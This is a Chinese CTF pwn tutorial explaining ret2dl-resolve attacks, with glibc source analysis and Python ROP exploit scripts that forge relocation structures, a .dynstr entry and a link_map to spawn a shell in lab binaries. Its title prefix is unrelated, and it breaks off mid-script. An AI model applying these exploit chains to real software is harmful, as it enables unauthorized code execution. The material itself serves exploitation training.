c# 定位内存快速增长_CTF丨Linux Pwn入门教程:针对函数重定位流程的相关测试(下)...
Linux Pwn入門教程系列分享已到尾聲,本套課程是作者依據(jù)i春秋Pwn入門課程中的技術(shù)分類,并結(jié)合近幾年賽事中出現(xiàn)的題目和文章整理出一份相對(duì)完整的Linux Pwn教程。
教程僅針對(duì)i386/amd64下的Linux Pwn常見的Pwn手法,如棧,堆,整數(shù)溢出,格式化字符串,條件競(jìng)爭(zhēng)等進(jìn)行介紹,所有環(huán)境都會(huì)封裝在Docker鏡像當(dāng)中,并提供調(diào)試用的教學(xué)程序,來自歷年賽事的原題和帶有注釋的python腳本。
今天i春秋與大家分享的是Linux Pwn入門教程中的最后一節(jié)內(nèi)容:針對(duì)函數(shù)重定位流程的相關(guān)測(cè)試(下),閱讀用時(shí)約20分鐘。
注:文末有本套課程所整理的全部?jī)?nèi)容,大家可收藏進(jìn)行系統(tǒng)學(xué)習(xí)。
32位下的ret2dl-resolve
通過一系列冗長(zhǎng)的源碼閱讀+調(diào)試分析,我們捋了一遍符號(hào)重定位的流程,現(xiàn)在我們要站在測(cè)試角度看待這個(gè)流程了。從上面的分析結(jié)果中我們知道其實(shí)最終影響解析的是函數(shù)的名字,那么如果我們強(qiáng)行把write改成system呢?我們來試一下。
我們強(qiáng)行修改內(nèi)存數(shù)據(jù),然后繼續(xù)運(yùn)行,發(fā)現(xiàn)劫持got表成功,此時(shí)write表項(xiàng)是system的地址。
那么我們是不是可以修改dynstr里面的數(shù)據(jù)呢?通過查看內(nèi)存屬性,我們很不幸地發(fā)現(xiàn).rel.plt. .dynsym .dynstr所在的內(nèi)存區(qū)域都不可寫。
這樣一來,我們能夠改變的就只有reloc_arg了。基于上面的分析,我們的思路是在內(nèi)存中偽造Elf32_Rel和Elf32_Sym兩個(gè)結(jié)構(gòu)體,并手動(dòng)傳遞reloc_arg使其指向我們偽造的結(jié)構(gòu)體,讓Elf32_Sym.st_name的偏移值指向預(yù)先放在內(nèi)存中的字符串system完成攻擊。為了地址可控,我們首先進(jìn)行棧劫持并跳轉(zhuǎn)到0x0804834B。
為此我們必須在bss段構(gòu)造一個(gè)新的棧,以便棧劫持完成后程序不會(huì)崩潰。ROP鏈如下:
#!/usr/bin/python#coding:utf-8
from pwn import *
context.update(os = 'linux', arch = 'i386')
start_addr = 0x08048350
read_plt = 0x08048310
write_plt = 0x08048340
write_plt_without_push_reloc_arg = 0x0804834b
leave_ret = 0x08048482
pop3_ret = 0x08048519
pop_ebp_ret = 0x0804851b
new_stack_addr = 0x0804a200? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#bss與got表相鄰,_dl_fixup中會(huì)降低棧后傳參,設(shè)置離bss首地址遠(yuǎn)一點(diǎn)防止參數(shù)寫入非法地址出錯(cuò)
io = remote('172.17.0.2', 10001)
payload = ""
payload += 'A'*140? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#調(diào)用read函數(shù)往新棧寫值,防止leave; retn到新棧后出現(xiàn)ret到地址0上導(dǎo)致出錯(cuò)
payload += p32(pop3_ret)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#read函數(shù)返回后從棧上彈出三個(gè)參數(shù)
payload += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#fd = 0
payload += p32(new_stack_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#buf = new_stack_addr
payload += p32(0x400)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#size = 0x400
payload += p32(pop_ebp_ret)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#把新棧頂給ebp,接下來利用leave指令把ebp的值賦給esp
payload += p32(new_stack_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(leave_ret)
io.send(payload)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#此時(shí)程序會(huì)停在我們使用payload調(diào)用的read函數(shù)處等待輸入數(shù)據(jù)
payload = ""
payload += "AAAA"? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#leave = mov esp, ebp; pop ebp,占位用于pop ebp
payload += p32(write_plt_without_push_reloc_arg)? ?? ???#按照我們的測(cè)試方案,強(qiáng)制程序?qū)rite函數(shù)重定位,reloc_arg由我們手動(dòng)放入棧中
payload += p32(0x18)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #手動(dòng)傳遞write的reloc_arg,調(diào)用write
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#函數(shù)執(zhí)行完后返回start
payload += p32(1)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#fd = 1
payload += p32(0x08048000)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#buf = ELF程序加載開頭,write會(huì)輸出ELF
payload += p32(4)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#size = 4
io.send(payload)
測(cè)試結(jié)果:
我們可以看到調(diào)用成功了。我們發(fā)現(xiàn)其實(shí)跳轉(zhuǎn)到write_plt_without_push_reloc_arg上,還是會(huì)直接跳轉(zhuǎn)到PLT[0],所以我們可以把這個(gè)地址改成PLT[0]的地址。
接下來我們開始著手在新的棧上偽造兩個(gè)結(jié)構(gòu)體:
write_got = 0x0804a018? ?? ???new_stack_addr = 0x0804a500? ?? ?? ?? ?? ?? ?? ?? ?#bss與got表相鄰,_dl_fixup中會(huì)降低棧后傳參,設(shè)置離bss首地址遠(yuǎn)一點(diǎn)防止參數(shù)寫入非法地址出錯(cuò)
relplt_addr = 0x080482b0? ?? ?? ?? ?? ?? ?? ?? ?#.rel.plt的首地址,通過計(jì)算首地址和新棧上我們偽造的結(jié)構(gòu)體Elf32_Rel偏移構(gòu)造reloc_arg
dymsym_addr = 0x080481cc? ?? ?? ?? ?? ?? ?? ?? ?#.dynsym的首地址,通過計(jì)算首地址和新棧上我們偽造的Elf32_Sym結(jié)構(gòu)體偏移構(gòu)造Elf32_Rel.r_info
dynstr_addr = 0x0804822c? ?? ?? ?? ?? ?? ?? ?? ?#.dynstr的首地址,通過計(jì)算首地址和新棧上我們偽造的函數(shù)名字符串system偏移構(gòu)造Elf32_Sym.st_name
fake_Elf32_Rel_addr = new_stack_addr + 0x50? ?? ???#在新棧上選擇一塊空間放偽造的Elf32_Rel結(jié)構(gòu)體,結(jié)構(gòu)體大小為8字節(jié)
fake_Elf32_Sym_addr = new_stack_addr + 0x5c? ?? ???#在偽造的Elf32_Rel結(jié)構(gòu)體后面接上偽造的Elf32_Sym結(jié)構(gòu)體,結(jié)構(gòu)體大小為0x10字節(jié)
binsh_addr = new_stack_addr + 0x74? ?? ?? ?? ?? ?? ?? ?? ?#把/bin/sh\x00字符串放在最后面
fake_reloc_arg = fake_Elf32_Rel_addr - relplt_addr? ?? ???#計(jì)算偽造的reloc_arg
fake_r_info = ((fake_Elf32_Sym_addr - dymsym_addr)/0x10) << 8 | 0x7 #偽造r_info,偏移要計(jì)算成下標(biāo),除以Elf32_Sym的大小,最后一字節(jié)為0x7
fake_st_name = new_stack_addr + 0x6c - dynstr_addr? ?? ?? ?? ?? ? #偽造的Elf32_Sym結(jié)構(gòu)體后面接上偽造的函數(shù)名字符串system
fake_Elf32_Rel_data = ""
fake_Elf32_Rel_data += p32(write_got)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_offset = write_got,以免重定位完畢回填got表的時(shí)候出現(xiàn)非法內(nèi)存訪問錯(cuò)誤
fake_Elf32_Rel_data += p32(fake_r_info)
fake_Elf32_Sym_data = ""
fake_Elf32_Sym_data += p32(fake_st_name)
fake_Elf32_Sym_data += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#后面的數(shù)據(jù)直接套用write函數(shù)的Elf32_Sym結(jié)構(gòu)體,具體成員變量含義自行搜索
fake_Elf32_Sym_data += p32(0)
fake_Elf32_Sym_data += p32(0x12)
我們把新棧的地址向后調(diào)整了一點(diǎn),因?yàn)樵谡{(diào)試深入到_dl_fixup的時(shí)候發(fā)現(xiàn)某行指令試圖對(duì)got表寫入,而got表正好就在bss的前面,緊接著bss,為了防止運(yùn)行出錯(cuò),我們進(jìn)行了調(diào)整。此外,需要注意的是偽造的兩個(gè)結(jié)構(gòu)體都要與其首地址保持對(duì)齊。完成了結(jié)構(gòu)體偽造之后,我們將這些內(nèi)容放在新棧中,調(diào)試的時(shí)候確認(rèn)整個(gè)偽造的鏈條正確,pwn it!
64位下的ret2dl-resolve
與32位不同,在64位下,雖然_dl_fixup函數(shù)的邏輯沒有改變,但是許多相關(guān)的變量和結(jié)構(gòu)體都有了變化。例如在glibc/sysdeps/x86_64/dl-runtime.c中定義了reloc_offset和reloc_index:
#define reloc_offset reloc_arg * sizeof (PLTREL)#define reloc_index??reloc_arg
#include
我們可以推斷出reloc_arg已經(jīng)不像32位中是作為一個(gè)偏移值存在,而是作為一個(gè)數(shù)組下標(biāo)存在。此外,兩個(gè)關(guān)鍵的結(jié)構(gòu)體也做出了調(diào)整:Elf32_Rel升級(jí)為Elf64_Rela, Elf32_Sym升級(jí)為Elf64_Sym,這兩個(gè)結(jié)構(gòu)體的大小均為0x18。
typedef struct{
??Elf64_Addr? ?? ???r_offset;? ?? ?? ?? ?? ? /* Address */
??Elf64_Xword? ?? ???r_info;? ?? ?? ?? ?? ?? ?? ?? ?/* Relocation type and symbol index */
??Elf64_Sxword? ?? ???r_addend;? ?? ?? ?? ?? ? /* Addend */
} Elf64_Rela;
typedef struct
{
??Elf64_Word? ?? ???st_name;? ?? ?? ?? ?? ? /* Symbol name (string tbl index) */
??unsigned char? ?? ???st_info;? ?? ?? ?? ?? ? /* Symbol type and binding */
??unsigned char st_other;? ?? ?? ?? ?? ? /* Symbol visibility */
??Elf64_Section? ?? ???st_shndx;? ?? ?? ?? ?? ? /* Section index */
??Elf64_Addr? ?? ???st_value;? ?? ?? ?? ?? ? /* Symbol value */
??Elf64_Xword? ?? ???st_size;? ?? ?? ?? ?? ? /* Symbol size */
} Elf64_Sym;
此外,_dl_runtime_resolve的實(shí)現(xiàn)位于glibc/sysdeps/x86_64/dl-trampoline.h中,其代碼加了宏定義之后可讀性很差,核心內(nèi)容仍然是調(diào)用_dl_fixup,此處不再分析。
最后,在64位下進(jìn)行ret2dl-resolve還有一個(gè)問題,即我們?cè)诜治鲈创a時(shí)提到但是應(yīng)用中卻忽略的一個(gè)潛在數(shù)組越界:
? ?? ???{
? ?? ?? ? const ElfW(Half) *vernum =
? ?? ?? ?? ?(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
? ?? ?? ? ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
? ?? ?? ? version = &l->l_versions[ndx];
? ?? ?? ? if (version->hash == 0)
? ?? ?? ?? ?version = NULL;
? ?? ???}
這里會(huì)使用reloc->r_info的高位作為下標(biāo)產(chǎn)生了ndx,然后在link_map的成員數(shù)組變量l_versions中取值作為version。為了在偽造的時(shí)候正確定位到sym,r_info必然會(huì)較大。在32位的情況下,由于程序的映射較為緊湊, reloc->r_info的高24位導(dǎo)致vernum數(shù)組越界的情況較少。
由于程序映射的原因,vernum數(shù)組首地址后面有大片內(nèi)存都是以0x00填充,測(cè)試導(dǎo)致reloc->r_info的高24位過大后從vernum數(shù)組中獲取到的ndx有很大概率是0,從而由于ndx異常導(dǎo)致l_versions數(shù)組越界的幾率也較低。我們可以對(duì)照源碼,IDA調(diào)試進(jìn)入_dl_fixup后,將斷點(diǎn)下在if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)附近。
中斷后切換到匯編
單步運(yùn)行到movzx edx, word ptr [edx+esi*2]一行
觀察edx的值,此處為0x0804827c, edx+esi*2 = 0x08048284,查看程序的內(nèi)存映射情況。
一直到地址0x0804b000都是可讀的,所以esi,也就是reloc->r_info的高24位最高可以達(dá)到0x16c2,考慮到.dymsym與.bss的間隔,這個(gè)允許范圍基本夠用。繼續(xù)往下看:
此時(shí)的edi = 0xf7fa9918,[edi+170h]保存的值為0Xf7f7eb08,其后連續(xù)可讀的地址最大值為0xf7faa000,因此mov ecx, [edx+4]一行,按照之前幾行匯編代碼的算法,只要取出的edx值不大于(0xf7faa000-0xf7f7eb08)/0x10 = 0x2b4f,version = &l->l_versions[ndx];就不會(huì)產(chǎn)生非法內(nèi)存訪問。仔細(xì)觀察會(huì)發(fā)現(xiàn)0x0804827c~0x0804b000之間幾乎所有的2字節(jié)word型數(shù)據(jù)都符合要求。因此,大部分情況下32位的題目很少會(huì)產(chǎn)生ret2dl-resolve在此處造成的段錯(cuò)誤。
而對(duì)于64位,我們用相同的方法調(diào)試本節(jié)的例子~/XMAN 2016-level3_64/level3_64會(huì)發(fā)現(xiàn)由于我們常用的bss段被映射到了0x600000之后,而dynsym的地址仍然在0x400000附近,r_info的高位將會(huì)變得很大,再加上此時(shí)vernum也在0x400000附近,vernum[ELFW(R_SYM) (reloc->r_info)]將會(huì)有很大概率落在在0x400000~0x600000間的不可讀區(qū)域。
從而產(chǎn)生一個(gè)段錯(cuò)誤。為了防止出現(xiàn)這個(gè)錯(cuò)誤,我們需要修改判斷流程,使得l->l_info[VERSYMIDX (DT_VERSYM)]為0,從而繞開這塊代碼。而l->l_info[VERSYMIDX (DT_VERSYM)]在64位中的位置就是link_map+0x1c8(對(duì)應(yīng)的,32位下為link_map+0xe4),所以我們需要泄露link_map地址并將link_map置為0。
64位下的ret2dl-resolve與32位下的ret2dl-resolve除了上述一些變化之外,exp構(gòu)造流程并沒有什么區(qū)別,在此處不再贅述,詳細(xì)腳本可見于附件。
理論上來說,ret2dl-resolve對(duì)于所有存在棧溢出,沒有Full RELRO(如果開啟了Full RELRO,所有符號(hào)將會(huì)在運(yùn)行時(shí)被全部解析,也就不存在_dl_fixup了)且有一個(gè)已知確定的棧地址(可以通過stack pivot劫持棧到已知地址)的程序都適用。但是我們從上面的64位ret2dl-resolve中可以看到其必須泄露link_map的地址才能完成利用,對(duì)于32位程序來說也可能出現(xiàn)同樣的問題。如果出現(xiàn)了不存在輸出的棧溢出程序,我們就沒辦法用這種套路了,那我們?cè)撛趺崔k呢?接下來的幾節(jié)我們將介紹一些不依賴泄露的攻擊手段。
使用ROPutils簡(jiǎn)化攻擊步驟
從上面32位和64位的攻擊腳本我們不難看出來,雖然構(gòu)造payload的過程很繁瑣,但是實(shí)際上大部分代碼的格式都是固定的,我們完全可以把它們封裝成一個(gè)函數(shù)進(jìn)行調(diào)用。當(dāng)然,我們還可以當(dāng)一把懶人,直接用別人寫好的庫。例如項(xiàng)目ROPutils(https://github.com/inaz2/roputils)
閱讀代碼roputils.py,其大部分我們會(huì)用到的東西都在ROP*和FormatStr這幾個(gè)類中,不過ROPutils也提供了其他的輔助工具類和函數(shù)。當(dāng)然,在本節(jié)中我們只會(huì)介紹和ret2dl-resolve相關(guān)的一些函數(shù)的用法,不做源碼分析和過多的介紹。
我們可以直接把roputils.py和自己寫的腳本放在同一個(gè)文件夾下以使用其中的功能。以~/XMAN 2016-level3/level4為例。其實(shí)我們會(huì)發(fā)現(xiàn)fake dl-resolve并不一定需要進(jìn)行棧劫持,我們只要確保偽造的link_map所在地址已知,且地址能被作為參數(shù)傳入_dl_fixup即可。我們先來構(gòu)造一個(gè)棧溢出,調(diào)用read讀取偽造的link_map到.bss中。
from roputils import *#為了防止命名沖突,這個(gè)腳本全部只使用roputils中的代碼。如果需要使用pwntools中的代碼需要在import roputils前import pwn,以使得roputils中的ROP覆蓋掉pwntools中的ROP
rop = ROP('./level4')? ?? ?? ?? ?? ?? ?? ?? ?#ROP繼承了ELF類,下面的section, got, plt都是調(diào)用父類的方法
bss_addr = rop.section('.bss')
read_got = rop.got('read')
read_plt = rop.plt('read')
offset = 140
io = Proc(host = '172.17.0.2', port = 10001)? ?? ???#roputils中這里需要顯式指定參數(shù)名
buf = rop.fill(offset)? ?? ?? ?? ?? ?? ?? ?? ?#fill用于生成填充數(shù)據(jù)
buf += rop.call(read_plt, 0, bss_addr, 0x100)? ?? ???#call可以通過某個(gè)函數(shù)的plt地址方便地進(jìn)行調(diào)用
buf += rop.dl_resolve_call(bss_addr+0x20, bss_addr)? ?? ???#dl_resolve_call有一個(gè)參數(shù)base和一個(gè)可選參數(shù)列表*args。base為偽造的link_map所在地址,*args為要傳遞給被劫持調(diào)用的函數(shù)的參數(shù)。這里我們將"/bin/sh\x00"放置在bss_addr處,link_map放置在bss_addr+0x20處
io.write(buf)
然后我們直接用dl_resolve_data生成偽造的link_map并發(fā)送
buf = rop.string('/bin/sh')? ?? ?? ?? ?? ?
buf += rop.fill(0x20, buf)? ?? ?? ?? ?? ? #如果fill的第二個(gè)參數(shù)被指定,相當(dāng)于將第二個(gè)參數(shù)命名的字符串填充至指定長(zhǎng)度
buf += rop.dl_resolve_data(bss_addr+0x20, 'system')? ?? ???#dl_resolve_data的參數(shù)也非常簡(jiǎn)單,第一個(gè)參數(shù)是偽造的link_map首地址,第二個(gè)參數(shù)是要偽造的函數(shù)名
buf += rop.fill(0x100, buf)
io.write(buf)
然后我們直接使用io.interact(0)就可以打開一個(gè)shell了。
關(guān)于roputils的用法可以參考其github倉庫中的examples,其他練習(xí)程序不再提供對(duì)應(yīng)的roputils寫法的腳本。
在.dynamic節(jié)中偽造.dynstr節(jié)地址
在32位的ret2dl-resolve一節(jié)中我們已經(jīng)發(fā)現(xiàn),ELF開發(fā)小組為了安全,設(shè)置.rel.plt. .dynsym .dynstr三個(gè)重定位相關(guān)的節(jié)區(qū)均為不可寫。然而ELF文件中有一個(gè).dynamic節(jié),其中保存了動(dòng)態(tài)鏈接器所需要的基本信息,而我們的.dynstr也屬于這些基本信息中的一個(gè)。
如果一個(gè)程序沒有開啟RELRO(即checksec顯示No RELRO).dynamic節(jié)是可寫的。(Partial RELRO和Full RELRO會(huì)在程序加載完成時(shí)設(shè)置.dynamic為不可寫,因此盡管readelf顯示其為可寫也不可相信)
.dynamic節(jié)中只包含Elf32/64_Dyn結(jié)構(gòu)體類型的數(shù)據(jù),這兩個(gè)結(jié)構(gòu)體定義在glibc/elf/elf.h下:
typedef struct{
??Elf32_Sword? ?? ???d_tag;? ?? ?? ?? ?? ?? ?? ?? ?/* Dynamic entry type */
??union
? ? {
? ?? ?Elf32_Word d_val;? ?? ?? ?? ?? ?? ?? ?? ?/* Integer value */
? ?? ?Elf32_Addr d_ptr;? ?? ?? ?? ?? ?? ?? ?? ?/* Address value */
? ? } d_un;
} Elf32_Dyn;
typedef struct
{
??Elf64_Sxword? ?? ???d_tag;? ?? ?? ?? ?? ?? ?? ?? ?/* Dynamic entry type */
??union
? ? {
? ?? ?Elf64_Xword d_val;? ?? ?? ?? ?? ? /* Integer value */
? ?? ?Elf64_Addr d_ptr;? ?? ?? ?? ?? ?? ?? ?? ?/* Address value */
? ? } d_un;
} Elf64_Dyn;
從結(jié)構(gòu)體的定義我們可以看出其由一個(gè)d_tag和一個(gè)union類型組成,union中的兩個(gè)變量會(huì)隨著不同的d_tag進(jìn)行切換,我們通過readelf看一下.dynstr的d_tag。
其標(biāo)記為0x05,union變量顯示為值0x0804820c。我們看一下內(nèi)存中.dynamic節(jié)中.dynstr對(duì)應(yīng)的Elf32_Dyn結(jié)構(gòu)體和指針指向的數(shù)據(jù)。
因此,我們只需要在棧溢出后程序中仍然存在至少一個(gè)未執(zhí)行過的函數(shù),我們就可以修改.dynstr對(duì)應(yīng)結(jié)構(gòu)體中的地址,從而使其指向我們偽造的.dynstr數(shù)據(jù),進(jìn)而在解析的時(shí)候解析出我們想要的函數(shù)。
我們以32位的程序?yàn)槔?#xff0c;打開~/fake_dynstr32/fake_dynstr32。
這個(gè)程序滿足了我們需要的一切條件——No RELRO,棧溢出發(fā)生在vuln中,exit不會(huì)被調(diào)用,因此我們可以用上述方法進(jìn)行攻擊。首先我們把所有的字符串從里面拿出來,并且把exit替換成system。
call_exit_addr = 0x08048495read_plt = 0x08048300
start_addr = 0x08048350
dynstr_d_ptr_address = 0x080496a4
fake_dynstr_address = 0x08049800
fake_dynstr_data = "\x00libc.so.6\x00_IO_stdin_used\x00system\x00\x00\x00\x00\x00\x00read\x00__libc_start_main\x00__gmon_start__\x00GLIBC_2.0\x00"
注意由于memset的一部分也會(huì)被system覆蓋掉,我們應(yīng)該把剩余的部分設(shè)置為\x00,防止后面的符號(hào)偏移值錯(cuò)誤。memset由于是在read函數(shù)運(yùn)行之前運(yùn)行的,所以它的符號(hào)已經(jīng)沒用了,可以被覆蓋掉。
接下來我們構(gòu)造ROP鏈依次寫入偽造的dynstr字符串和其保存在Elf32_Dyn中的地址。
payload = ""
payload += 'A'*22? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#修改.dynstr對(duì)應(yīng)的Elf32_Dyn.d_ptr
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
payload += p32(dynstr_d_ptr_address)? ?? ???
payload += p32(4)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
io.send(payload)
sleep(0.5)
io.send(p32(fake_dynstr_address))? ?? ?? ?? ?? ? #新的.dynstr地址
sleep(0.5)
payload = ""
payload += 'A'*22? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#在內(nèi)存中偽造一塊.dynstr字符串
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(0)? ?? ?? ?? ?? ?
payload += p32(fake_dynstr_address)
payload += p32(len(fake_dynstr_data)+8)? ?? ???#長(zhǎng)度是.dynstr加上8,把"/bin/sh\x00"接在后面
io.send(payload)
sleep(0.5)
io.send(fake_dynstr_data+"/bin/sh\x00")? ?? ???#把/bin/sh\x00接在后面
sleep(0.5)
此時(shí)還剩下函數(shù)exit未被調(diào)用,我們通過前面的步驟偽造了.dynstr,將其中的exit改成了system,因此根據(jù)_dl_fixup的原理,此時(shí)函數(shù)將會(huì)解析system的首地址并返回到system上。
64位下的利用方式與32位下并沒有區(qū)別,此處不再進(jìn)行詳細(xì)分析。
fake link_map
由于各種保護(hù)方式的普及,現(xiàn)在能碰到No RELRO的程序已經(jīng)很少了,因此上節(jié)所述的攻擊方式能用上的機(jī)會(huì)并不多,所以這節(jié)我們介紹另外一種方式——通過偽造link_map結(jié)構(gòu)體進(jìn)行攻擊。
在前面的源碼分析中,我們主要把目光集中在未解析過的函數(shù)在_dl_fixup的流程中而忽略了另外一個(gè)分支。
_dl_fixup (# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
? ?? ?? ???ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
? ?? ?? ???struct link_map *l, ElfW(Word) reloc_arg)
{
??………… //變量定義,初始化等等
??if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0) //判斷函數(shù)是否被解析過。此前我們一直利用未解析過的函數(shù)的結(jié)構(gòu)體,所以這里的if始終成立
? ?…………
? ?? ?result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?version, ELF_RTYPE_CLASS_PLT, flags, NULL);
…………
? ? }
??else
? ? {
? ?? ?/* We already found the symbol.??The module (and therefore its load
? ?? ?? ?address) is also known.??*/
? ?? ?value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
? ?? ?result = l;
? ? }
…………
}
通過注釋我們可以看到之前的if起的是判斷函數(shù)是否被解析過的作用,如果函數(shù)被解析過,_dl_fixup就不會(huì)調(diào)用_dl_lookup_symbol_x對(duì)函數(shù)進(jìn)行重定位,而是直接通過宏DL_FIXUP_MAKE_VALUE計(jì)算出結(jié)果。這邊用到了link_map的成員變量l_addr和Elf32/64_Sym的成員變量st_value。這里的l_addr是實(shí)際映射地址和原來指定的映射地址的差值,st_value根據(jù)對(duì)應(yīng)節(jié)的索引值有不同的含義。
不過在這里我們并不需要關(guān)心那么多,我們只需要知道如果我們能使l->l_addr + sym->st_value指向一個(gè)函數(shù)的在內(nèi)存中的實(shí)際地址,那么我們就能返回到這個(gè)函數(shù)上。但是問題來了,如果我們知道了system在內(nèi)存中的實(shí)際地址,我們何苦用那么麻煩的方式跳轉(zhuǎn)到system上呢?所以答案是我們不知道。
我們需要做的是讓l->l_addr和sym->st_value其中之一落在got表的某個(gè)已解析的函數(shù)上(如__libc_start_main),而另一個(gè)則設(shè)置為system函數(shù)和這個(gè)函數(shù)的偏移值。既然我們都偽造了link_map,那么顯然l_addr是我們可以控制的,而sym根據(jù)我們的源碼分析,它的值最終也是從link_map中獲得的(很多節(jié)區(qū)地址,包括.rel.plt, .dynsym, dynstr都是從中取值,更多細(xì)節(jié)可以對(duì)比調(diào)試時(shí)的link_map數(shù)據(jù)與源碼進(jìn)行學(xué)習(xí))
const ElfW(Sym) *const symtab= (const void *) D_PTR (l, l_info[DT_SYMTAB]);??const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);
??const PLTREL *const reloc
? ? = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
??const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
所以這兩個(gè)值我們都可以進(jìn)行偽造。此時(shí)只要我們知道libc的版本,就能算出system與已解析函數(shù)之間的偏移了。
說到這里可能有人會(huì)想到,既然偽造的link_map那么厲害,那么我們?yōu)槭裁床辉谇懊娴膁l-resolve中直接偽造出.dynstr的地址,而要通過一條冗長(zhǎng)的求值鏈返回到system呢?我們來看一下上面的這行代碼:
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?version, ELF_RTYPE_CLASS_PLT, flags, NULL);
根據(jù)位于glibc/include/Link.h中的link_map結(jié)構(gòu)體定義,這里的l_scope是一個(gè)當(dāng)前l(fā)ink_map的查找范圍數(shù)組。我們從link_map結(jié)構(gòu)體的定義可以看出來其實(shí)這是一個(gè)雙鏈表,每一個(gè)link_map元素都保存了一個(gè)函數(shù)庫的信息。當(dāng)查找某個(gè)符號(hào)的時(shí)候,實(shí)際上是通過遍歷整個(gè)雙鏈表,在每個(gè)函數(shù)庫中進(jìn)行的查詢。顯然,我們不可能知道libc的link_map地址,所以我們沒辦法偽造l_scope,也就沒辦法偽造整個(gè)link_map使流程進(jìn)入_dl_lookup_symbol_x,只能選擇讓流程進(jìn)入“函數(shù)已被解析過”的分支。
回到主題,我們?yōu)榱俗尯瘮?shù)流程繞過_dl_lookup_symbol_x,必須偽造sym使得ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0,根據(jù)sym的定義,我們就得偽造symtab和reloc->r_info,所以我們得偽造DT_SYMTAB, DT_JMPREL,此外,我們得偽造strtab為可讀地址,所以還得偽造DT_STRTAB,所以我們需要偽造link_map前0xf8個(gè)字節(jié)的數(shù)據(jù),需要關(guān)注的分別是位于link_map+0的l_addr,位于link_map+0x68的DT_STRTAB指針,位于link_map+0x70的DT_SYMTAB指針和位于link_map+0xF8的DT_JMPREL指針。
此外,我們需要偽造Elf64_Sym結(jié)構(gòu)體,Elf64_Rela結(jié)構(gòu)體,由于DT_JMPREL指向的是Elf64_Dyn結(jié)構(gòu)體,我們也需要偽造一個(gè)這樣的結(jié)構(gòu)體。當(dāng)然,我們得讓reloc_offset為0.為了偽造的方便,我們可以選擇讓l->l_addr為已解析函數(shù)內(nèi)存地址和system的偏移,sym->st_value為已解析的函數(shù)地址的指針-8,即其got表項(xiàng)-8。(這部分在源碼中似乎并沒有體現(xiàn)出來,但是調(diào)試的時(shí)候發(fā)現(xiàn)實(shí)際上會(huì)+8,原因不明)我們還是以~/XMAN 2016-level3_64/level3_64為例進(jìn)行分析。
首先我們來構(gòu)造一個(gè)fake link_map:
fake_link_map_data += p64(offset)? ?? ?? ?? ?? ?? ?? ?? ?# +0x00 l_addr offset = system - __libc_start_main
fake_link_map_data += '\x00'*0x60
fake_link_map_data += p64(DT_STRTAB)? ?? ?? ?? ?? ? #+0x68 DT_STRTAB
fake_link_map_data += p64(DT_SYMTAB)? ?? ?? ?? ?? ? #+0x70 DT_SYMTAB
fake_link_map_data += '\x00'*0x80
fake_link_map_data += p64(DT_JMPREL)? ?? ?? ?? ?? ? #+0xf8 DT_JMPREL
